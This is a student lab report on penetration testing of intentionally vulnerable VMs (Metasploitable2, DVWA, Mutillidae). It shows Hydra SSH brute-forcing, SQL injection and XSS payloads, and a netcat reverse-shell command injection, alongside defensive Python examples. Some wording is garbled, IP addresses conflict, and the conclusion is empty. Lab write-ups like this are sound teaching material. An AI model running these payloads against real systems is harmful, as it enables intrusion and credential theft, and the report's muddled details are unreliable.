
Linux Platform Security Development

Shiv Patel
Masters in Information System Security Management
Concordia University of Edmonton
spatel3@student.concordia.ab.ca

Abstract—Data storage is exceptionally critical today, as more and more classified information, such as medical records, is being processed securely on electronic devices, and such devices are linked to computer networks or internet service. Software security and web security play a crucial role across the different aspects of cybersecurity. This includes evaluating the reliability of systems and software apps that are open to the outside world and thus possible targets of even more attacks such as boundary violations, cross-site scripting, command injections, and SQL injections. The purpose of penetration testing is to ensure that there is no security vulnerability in the system and network that gives unauthorized access to the system and network. Penetration testing is one feasible and effective method of avoiding system or network attacks. This report summarizes some fundamentals of penetration testing and reviews existing exploits and resources on the Metasploitable VM.

Keywords— Penetration testing, vulnerabilities, security, exploit.

I. INTRODUCTION

A variety of websites are created, and public agencies, educational organizations, and global companies have moved from the centralized development/management approach built separately for the website, with specific goals to develop and operate a majority of sites via a single SaaS (Software as a Service) engine or Application Leasing (ASP) process. The cloud service environment includes several data vulnerability delivery sites, a network operating system that utilizes a single cow. Furthermore, there are also security problems and accidents as the website runs.

Recently, web innovation has grown into other areas of life and work and has influenced people. Many day-to-day tasks that involved face-to-face contact can now be carried out on the Internet. Web services are essential elements of our lives. These include such important things as financial transactions, e-commerce, e-business, e-government, e-procurement, e-education, and much more. According to Positive Technologies (ptsecurity.com), nearly 82 percent of bugs are in the application code, and cyber threats target application vulnerabilities.

Penetration testing is a crucial strategy for evaluating the robust, efficient, interconnected and trustworthy computing base composed of software, hardware, and individuals.

The following diagram shows the basic process of penetration testing:

[Diagram: Information Gathering, Vulnerabilities Analysis, Vulnerability Exploitation, Post Exploitation, Report Generation]

Fig 1. Basic Pen Testing Process.

The performance of a penetration test is dependent on the analysis obtained and on acquiring as much knowledge as possible regarding the program and the applied infrastructure. In this lab, I deployed a "Metasploitable" web application development model and concentrated on crossing points whereby client requests are approved and complex data is expressed. First, I checked these exposed areas for flaws such as authorization, verification of inputs, session management and leak of data. Depending on the feedback created, I built payloads in the form of errors and replies to any request to dump the content of the database using SQL Injection, obtain a reverse shell by injecting commands, and steal cookies using Cross-Site Scripting.

II. METHODOLOGY-I

A. Getting Ready for the workplace

To complete lab 3, some prerequisites need to be in place, as follows:

• Install VMware Workstation on the system for Windows.
• Download the Kali ISO file and the Metasploitable VM file.

I will set up two virtual machines running Kali Linux and Metasploitable2 to do a vulnerability assessment and penetration test.

Metasploitable VM setup: The Metasploitable virtual machine is a deliberately insecure variant of Ubuntu Linux intended to check protection software and illustrate specific vulnerabilities. First, we need to access the Metasploitable 2 virtual machine that includes the insecure host system on which we will be training in the lab. Ensure you have adequate space on your host network to mount the VM and operate it. When you run Kali in a VM on the same server, you need to provide at least 10 gigabytes of system resources and optimal RAM for your host device, the Metasploitable system, and Kali Linux. The Metasploitable 2 download can be found at Sourceforge. After loading the VM in VMware Workstation, run it. Log in to the virtual machine by using the credentials (Username: msfadmin, Password: msfadmin). I used the ifconfig command to test if DHCP was able to automatically accept an IP address from my system. My Metasploitable VM's IP address is 192.168.1.130.

Fig 2. Shows The IP Address Of Metasploitable VM
Kali Linux setup: Kali Linux is a powerful and versatile operating system designed and built by Offensive Security. Kali Linux is primarily developed to satisfy the necessary criteria of fully qualified penetration testing and security auditing. It provides pre-installed vulnerability detection and penetration testing tools for network traffic sniffing, efficiency threats, security analysis, and many more. I downloaded Kali Linux from https://www.kali.org/downloads/, the official platform for Offensive Security, and I built a few unique payloads to attack earlier. I'm going to use the Kali VM, but I'm going to migrate from a Bridged Network framework to a NAT network. After downloading Kali Linux, I issued it 40 GB of space and 8 GB of RAM for a latency-free ride permanently. I started up my Kali VM and used the ifconfig command to search for its IP address. The allocated IP address was 192.168.1.131.

Fig 3. Shows The IP Address Of Kali VM

B. DVWA penetration testing using BurpSuite

DVWA: DVWA is a PHP/MySQL coded Damn Vulnerable Web Application. It is far too fragile. Ethical hackers test their expertise in this protection app and use these resources in a secure setting. This also lets coders grasp application security processes and teachers/students teach/learn to secure web applications in a safer environment. DVWA's goal is to learn some of the most prevalent weaknesses in the network, with specific degrees of complexity. Older DVWA had four tiers of protection, including Easy, Moderate, Hard and Impossible, but now there are three levels: low, medium and high. I've carried out numerous attacks at all stages of defence.

Burp Suite: Burp Suite is an advanced web application security platform which is simple to use. Burp provides many resources that are combined effortlessly, enabling you to check any feature and element of modern web applications. If you have to test the robustness of your authentication system, the sameness of your session tokens, or the check points for input validation found in your application, the scanner tool tests for website configuration and bugs. The proxy function involves updating, tracking and reissuing queries. It operates in a proxy mode and can intercept both HTTP requests and user replies. The attacker device assists in executing custom attacks for automatic defence checking. Burpsuite's pro edition has a lot of features but I never had the chance to test them. It not only allows in-depth manual assessment, it also blends automated techniques to summarise and evaluate tools for web applications.

Brute Force attack through Burpsuite: First of all, I ran all my VMs and I put 192.168.1.131 in the browser of the Kali VM, where I could see Metasploitable's homepage for bypassing authentication. I clicked DVWA, which led me to the DVWA website, and modified the Low to High security level. DVWA's default login credentials are admin and password, because it's already a 'vulnerable' web device, but I want to bypass authentication with a brute force attack. I built a Burp Suite project and switched on the proxy tool's intercept mode. I've used a localhost proxy in my browser config. I can view all HTTP queries and replies by doing so, because each request passes through my localhost and Burp intercepts and records it.

Fig 4. Proxy Of A Browser.

After which, whenever I insert some context in the username and password sector, Burp might decrypt the request and I see the passwords in non-encrypted plain text in the fields of usernames and passwords. I picked the HTTP request and I went to the intruding tool, where I stacked the two username and password fields in the form of a wordlist.

After the attack had been pushed, I noticed 36 requests were redirected to the DVWA login page at the beginning of the attack (Username 6 x Password 6 = 36). 35 of those 36 requests had brute forces failed in duration 488 and only 1 had the right attempt, 4951.

Fig 5. Success Of Brute Force Attack.

Post Attack Brute Force with THC-Hydra: THC-Hydra is a Kali Linux tool that can brute-force a remote authentication service. To determine the system's admin name and user password, we will use the hydra method. A username and password list is generated first for that. Hydra is a simple and scalable password cracking tool that is used
in Kali Linux, supporting numerous protocols. Now launch the Kali Linux terminal and set user.txt for username and password.txt for password, then I execute: hydra -L users.txt -P passwords.txt ssh://192.168.1.131 -t 4

Fig 5. Shows Hydra Code Execution.

SQL injection Attack: SQL Injection (SQLi) is a form of injection attack where malicious SQL statements may be executed. Such statements control a web application backed by a SQL database. Attackers can use SQL injection vulnerabilities to override security measures in the app. Query validation and parameterized queries with prepared statements are the only secure way to avoid SQL injection attacks. If SQL injection succeeds, secret confidential data such as database tables may be recovered, the database logic modified, or even a backdoor accessed. While I was doing SQL injection on the UserID location, I did so by making sure that my SQL query performance is always TRUE. I utilized "1' or 1=1 #", which results in 1, meaning Valid. I obtained the user table information from the site. I used "1' OR 1=1 UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES #" to learn the database structure and database metadata. This order would display all entries in the database, supplying us with the database info.

Cross Site Scripting attack: Cross-Site Scripting (XSS), usually seen in web apps, is one form of computer security vulnerability. XSS attacks allow attackers to implant client-side scripts into web pages viewed by other users. There exist three kinds of cross-site scripting attacks: Stored, Reflected and DOM-based. I enhanced the security to medium to conduct an XSS attack. After this, I was able to type anything in the name field. To perform XSS, I used the script <button onClick="alert('this XSS')">Click</button>, which will pop up a message box with this is XSS. Now every time someone accesses this page, they will see the popup, as it is stored on the server.

Remote Command execution: Command injection is an attack to perform unauthorized commands on the host operating system from a compromised application. Command injection attacks are possible when vulnerable client data (forms, metadata, HTTP headers, etc.) is passed by a program to the system shell. Remote code execution is an intrusion in which the attacker gets shell access to the system on which the web-based program is hosted and can run code on the host machine. In DVWA, I kept the degree of protection mild. To execute remote code, I used 192.168.1.131 on this link and pwd, which shows the present directory. I navigated to the following website: http://192.168.1.131/dvwa/vulnerabilities/exec/.

Fig 6. Shows Command Execution On DVWA.

I've used a tool named Netcraft to execute remote-code execution that I am going to listen to 192.168.1.131 in Kali Linux on port number 1234. I used "127.0.0.1 | nc 192.168.1.131 1234 -e /bin/sh" in the input field on DVWA. This command connects our Metasploitable system to port 1234. As I returned to my Kali screen, I found that I could see the files and directories in the current working directory by using the ls button.

Fig 7. Shows Remote Command Execution On Kali Linux.

Upon accessing the network, a brute force attack must be carried out to obtain the user's credentials. As we said, we need to learn, for a user named msfadmin, what the user's password is so that they can sign in to the system. We used Hydra and not DVWA in this situation to demonstrate brute force: "hydra -L users.txt -P passwords.txt ssh://192.168.1.131 -t 4", where -L is the logon names list, -P the passwords list, -t sets the number of tasks to run in parallel, and ssh://192.168.1.131 is the target and protocol. After a while, the attack completes and the active logins are shown to us. "ssh msfadmin@192.168.1.131" is used, and it requests a password for msfadmin. As we know the password that we got from the brute force attack, we will now use it with this ssh order, and the Metasploitable will be signed in.

Fig 8. Shows Metasploitable terminal through SSH
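Seen from the target's side, the Hydra run described above leaves a burst of failed SSH logins from one address followed by a success. The following is an added example, not part of the original report: a Python detector for that pattern. The log lines are constructed in the usual OpenSSH auth.log format, and the function name and the threshold of 5 failures are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the usual OpenSSH auth.log format (not from the report).
SAMPLE_LOG = """\
Mar  3 10:15:01 metasploitable sshd[4101]: Failed password for root from 192.168.1.131 port 40112 ssh2
Mar  3 10:15:01 metasploitable sshd[4102]: Failed password for invalid user admin from 192.168.1.131 port 40114 ssh2
Mar  3 10:15:02 metasploitable sshd[4103]: Failed password for msfadmin from 192.168.1.131 port 40116 ssh2
Mar  3 10:15:02 metasploitable sshd[4104]: Failed password for msfadmin from 192.168.1.131 port 40118 ssh2
Mar  3 10:15:04 metasploitable sshd[4105]: Failed password for root from 192.168.1.131 port 40120 ssh2
Mar  3 10:15:05 metasploitable sshd[4106]: Failed password for msfadmin from 192.168.1.131 port 40122 ssh2
Mar  3 10:15:06 metasploitable sshd[4107]: Accepted password for msfadmin from 192.168.1.131 port 40124 ssh2
Mar  3 10:20:11 metasploitable sshd[4120]: Failed password for alice from 192.168.1.50 port 51544 ssh2
Mar  3 10:20:19 metasploitable sshd[4121]: Accepted password for alice from 192.168.1.50 port 51546 ssh2
"""

LINE_RE = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5):
    """Return one finding per source address with >= threshold failed logins.

    'compromised' lists accounts that logged in from that source after the
    threshold was reached, i.e. a guess that probably succeeded.
    """
    failures = defaultdict(int)
    users_tried = defaultdict(set)
    compromised = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        src, user = m["src"], m["user"]
        if m["result"] == "Failed":
            failures[src] += 1
            users_tried[src].add(user)
        elif failures[src] >= threshold:
            compromised[src].append(user)
    return [
        {"src": src, "failures": n, "users_tried": sorted(users_tried[src]),
         "compromised": compromised[src]}
        for src, n in failures.items() if n >= threshold
    ]
```

A single mistyped password followed by a login, as from 192.168.1.50 in the sample, stays below the threshold and is not reported.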
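The DVWA command-execution step earlier in this section works because the submitted "IP address" reaches a shell as part of a command string. The following added example (not DVWA's code and not part of the original report) puts that pattern beside a hardened form that validates the input as an IPv4 address and runs ping without a shell. The function names are hypothetical, and the sample inputs are constructed from the report's "IP | command" input using the harmless pwd.

```python
import ipaddress
import subprocess

def unsafe_ping_command(target):
    # Assumed shape of the vulnerable pattern: the input is concatenated into
    # a string that a shell will parse, so "|", ";" or "$(...)" in the input
    # starts a second command.
    return "ping -c 4 " + target

def build_ping_argv(target):
    """Validate target as a literal IPv4 address and return an argv list.

    Raises ValueError for anything else, including shell metacharacters
    and values that ping would read as an option.
    """
    addr = ipaddress.IPv4Address(target.strip())
    return ["ping", "-c", "4", str(addr)]

def safe_ping(target, timeout=30):
    # argv list with shell=False: no shell ever parses the input, and the
    # address has already been validated and normalised above.
    argv = build_ping_argv(target)
    result = subprocess.run(argv, shell=False, capture_output=True,
                            text=True, timeout=timeout)
    return result.returncode

def is_rejected(target):
    """True if the hardened path refuses the input before running anything."""
    try:
        build_ping_argv(target)
    except ValueError:
        return True
    return False

# Constructed inputs: one legitimate address, then injection-style values.
SAMPLES = ["127.0.0.1", "127.0.0.1 | pwd", "127.0.0.1; pwd", "$(pwd)", "-f 127.0.0.1"]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = "rejected" if is_rejected(sample) else "accepted"
        print(f"{sample!r}: shell would see {unsafe_ping_command(sample)!r}; "
              f"hardened path: {verdict}")
```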
C. Penetration Testing On Mutillidae
SQLi-Extract Data: Here we access the Mutillidae application. The admin account authentication command "' 1 or 1=1--" has been issued. Anything after -- in the command is a comment, and 1=1 is often used as the true condition. We have all the data of the database, which includes username, password and signature.

Fig 9. Shows the SQL injection on Mutillidae.
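Both SQL injection steps in this report (the DVWA UserID field and the Mutillidae login) rely on input being pasted into the SQL text. The following added example, not code from DVWA, Mutillidae or the original report, shows the same lookup written that way and as a parameterized query. It uses an in-memory SQLite table with constructed rows as a stand-in for the MySQL back end, so the always-true input ends with SQLite's "--" comment where the report's MySQL input uses "#"; all function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the application's users table (SQLite, in memory)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("1", "admin", "hash-a"),
        ("2", "alice", "hash-b"),
        ("3", "bob", "hash-c"),
    ])
    return db

def lookup_vulnerable(db, user_id):
    # The input is pasted into the SQL text, so a quote inside it ends the
    # string literal and the rest of the input is parsed as SQL.
    sql = "SELECT first_name FROM users WHERE user_id = '" + user_id + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, user_id):
    # The statement text is fixed; the driver binds user_id as a value, so it
    # can only ever be compared against the user_id column.
    sql = "SELECT first_name FROM users WHERE user_id = ?"
    return [row[0] for row in db.execute(sql, (user_id,))]

# The report's always-true input, with "--" (SQLite) in place of "#" (MySQL).
TAUTOLOGY = "1' OR 1=1 -- "

def compare(user_input):
    """Run both lookups on the same input and return what each one leaks."""
    db = make_db()
    return {
        "vulnerable": sorted(lookup_vulnerable(db, user_input)),
        "parameterized": sorted(lookup_parameterized(db, user_input)),
    }

if __name__ == "__main__":
    print(compare("1"))        # both return only the matching row
    print(compare(TAUTOLOGY))  # only the concatenated query returns every row
```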

XSS (Cross-Site Scripting attack): The final attack executed was XSS: when somebody tries to change the background colour, the user's screen prompts an alert. In the background colour section, where the appropriate background colour is written in a text box, we write the HTML script <script>alert("hello xss world")</script>. When the user executes it, he/she will be shown a warning box that displays hello XSS world.

Fig 10. Shows The XSS attack On Mutillidae
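The two XSS inputs in this report land in different output contexts, and each needs its own handling. The following is an added example, not code from DVWA, Mutillidae or the original report: output encoding for the stored name field, and allow-list validation for the background colour value. The HTML templates, the function names and the assumption that a colour is six hex digits are hypothetical.

```python
import html
import re

# Assumption: a valid background colour is exactly six hex digits, e.g. FF0000.
HEX_COLOUR = re.compile(r"[0-9A-Fa-f]{6}")

def render_guestbook_entry(name, message):
    # HTML body context: encode &, <, >, " and ' so that stored input is
    # displayed as text instead of being parsed as markup.
    return "<div>Name: {}<br>Message: {}</div>".format(
        html.escape(name, quote=True), html.escape(message, quote=True))

def render_background(colour, default="FFFFFF"):
    # Attribute/CSS context: accept only values in the expected format and
    # fall back to a default for everything else.
    value = colour if HEX_COLOUR.fullmatch(colour) else default
    return '<body style="background-color:#{}">'.format(value)

# The two inputs used in the report.
STORED_INPUT = "<button onClick=\"alert('this XSS')\">Click</button>"
COLOUR_INPUT = '<script>alert("hello xss world")</script>'

if __name__ == "__main__":
    print(render_guestbook_entry(STORED_INPUT, "hello"))
    print(render_background(COLOUR_INPUT))
    print(render_background("FF0000"))
```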

III. CONCLUSION
